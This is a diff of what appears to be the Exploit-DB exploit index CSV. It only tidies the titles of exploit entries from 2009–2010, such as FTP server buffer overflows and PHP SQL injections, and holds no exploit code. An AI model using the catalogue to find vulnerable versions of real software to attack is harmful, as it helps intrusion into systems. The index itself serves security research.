 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
 6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
@@ -7254,7 +7254,7 @@ id,file,description,date,author,platform,type,port
 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0
 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0
 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0
-7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP write Password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
+7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local,0
 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local,0
 7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0
@@ -7414,7 +7414,7 @@ id,file,description,date,author,platform,type,port
 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
-7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
+7875,platforms/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
@@ -7540,7 +7540,7 @@ id,file,description,date,author,platform,type,port
 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
-8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0
+8008,platforms/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0
 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0
 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
@@ -7694,7 +7694,7 @@ id,file,description,date,author,platform,type,port
 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0
 8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local,0
 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0
-8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow",2009-03-09,Elazar,windows,remote,0
+8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0
 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0
 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation",2009-03-09,"NT Internals",windows,local,0
 8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0
@@ -7730,8 +7730,8 @@ id,file,description,date,author,platform,type,port
 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0
 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0
 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
-8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
-8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
+8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
+8212,platforms/windows/dos/8212.pl,"Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
 8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0
 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
@@ -7808,7 +7808,7 @@ id,file,description,date,author,platform,type,port
 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0
 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
-8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0
+8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0
 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
@@ -8158,7 +8158,7 @@ id,file,description,date,author,platform,type,port
 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
-8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
+8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0
 8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0
@@ -8395,7 +8395,7 @@ id,file,description,date,author,platform,type,port
 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0
 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0
 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0
-8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0
+8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0
 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0
 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0
@@ -8771,7 +8771,7 @@ id,file,description,date,author,platform,type,port
 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
-9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos,0
+9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown Exploit",2009-07-28,"Core Security",windows,dos,0
 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0
 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0
 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0
@@ -8946,7 +8946,7 @@ id,file,description,date,author,platform,type,port
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
-9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
+9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
@@ -9475,7 +9475,7 @@ id,file,description,date,author,platform,type,port
 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80
 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
-10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21
+10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21
 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80
@@ -9530,7 +9530,7 @@ id,file,description,date,author,platform,type,port
 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0
 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21
 10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0
-10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21
+10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21
 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000
 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0
@@ -10029,7 +10029,7 @@ id,file,description,date,author,platform,type,port
 10817,platforms/php/webapps/10817.txt,"Joomla! Component com_airmonoblock - Blind SQL Injection",2009-12-30,Pyske,php,webapps,0
 10819,platforms/asp/webapps/10819.txt,"gallery_show.asp - GID Blind SQL Injection",2009-12-30,R3d-D3V!L,asp,webapps,0
 10820,platforms/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,php,dos,80
-10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,multiple,webapps,0
+10821,platforms/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,multiple,webapps,0
 10822,platforms/php/webapps/10822.txt,"Joomla! Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,php,webapps,0
 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0
 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0
@@ -10169,7 +10169,7 @@ id,file,description,date,author,platform,type,port
 11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0
 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0
 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,php,webapps,0
-11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BoF - bindshell",2010-01-06,sinn3r,windows,local,0
+11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0
 11047,platforms/php/webapps/11047.txt,"Zeeways Technology - 'product_desc.php' SQL Injection",2010-01-07,Gamoscu,php,webapps,0
 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - ladder.php SQL Injection",2010-01-07,Sora,php,webapps,0
 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script - 'index.php' Directory Traversal",2010-01-07,Red-D3v1L,php,webapps,0
@@ -10388,7 +10388,7 @@ id,file,description,date,author,platform,type,port
 11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11327,platforms/php/webapps/11327.txt,"myBusinessAdmin - 'content.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0
-11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0
+11328,platforms/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0
 11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps,0
 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps,0
 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,windows,local,0
@@ -10492,7 +10492,7 @@ id,file,description,date,author,platform,type,port
 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
-11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
+11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0
 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0
@@ -10505,9 +10505,9 @@ id,file,description,date,author,platform,type,port
 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0
 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0
 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0
-11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21
-11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
-11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
+11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21
+11469,platforms/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
+11470,platforms/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0
 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0
 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
@@ -10535,7 +10535,7 @@ id,file,description,date,author,platform,type,port
 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0
 11498,platforms/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0
 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0
-11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0
+11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0
 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0
 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0
 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0
@@ -10565,12 +10565,12 @@ id,file,description,date,author,platform,type,port
 11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - '.avi' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0
 11536,platforms/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0
 11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0
-11539,platforms/windows/remote/11539.py,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
+11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
 11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos,0
 11541,platforms/windows/dos/11541.pl,"E.M. Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos,0
 11543,platforms/php/webapps/11543.txt,"Softbiz Jobs - Cross-Site Request Forgery",2010-02-23,"pratul agrawal",php,webapps,0
 11544,platforms/php/webapps/11544.php,"Joomla! Component com_ice - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0
-11546,platforms/hardware/dos/11546.py,"iPhone - FTP Server (WiFi FTP) by SavySoda Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0
+11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0
 11547,platforms/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
 11548,platforms/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
 11549,platforms/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0
@@ -10663,7 +10663,7 @@ id,file,description,date,author,platform,type,port
 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0
 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0
-11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' crash",2010-03-07,l3D,windows,dos,0
+11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0
 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0
 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0
 11656,platforms/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0
@@ -10674,7 +10674,7 @@ id,file,description,date,author,platform,type,port
 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0
 11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0
-11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
+11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0
 11671,platforms/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0
@@ -10805,15 +10805,15 @@ id,file,description,date,author,platform,type,port 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 -11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 -11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 +11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 